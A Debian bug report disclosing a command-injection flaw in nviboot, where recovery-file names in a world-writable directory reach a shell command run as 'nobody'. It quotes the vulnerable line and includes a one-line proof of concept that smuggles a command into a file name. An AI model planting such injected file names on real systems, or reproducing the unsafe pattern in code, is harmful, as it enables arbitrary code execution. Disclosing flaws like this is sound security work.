Bug#769719: nviboot fails to send recovery mail

[Jakub Wilk <jwilk@jwilk.net>]

Control: tags -1 + security

* Adam M. Costello <bug.amc+7+@nicemice.net>, 2014-11-15, 20:47:
> (su - nobody -s /bin/sh -c "$SENDMAIL $owner < $i" &) </dev/null >/dev/null 2>&0

Note that "$i" is a name of a file any user can create. This allows 
executing arbitrary code as user "nobody".

PoC exploit:

$ echo 'X-vi-recover-path: /etc/fstab' > '/var/tmp/vi.recover/recover.moo;z=$(pwd|head${IFS}-c1);apt-get${IFS}moo>${z}tmp${z}pwned'

--
Jakub Wilk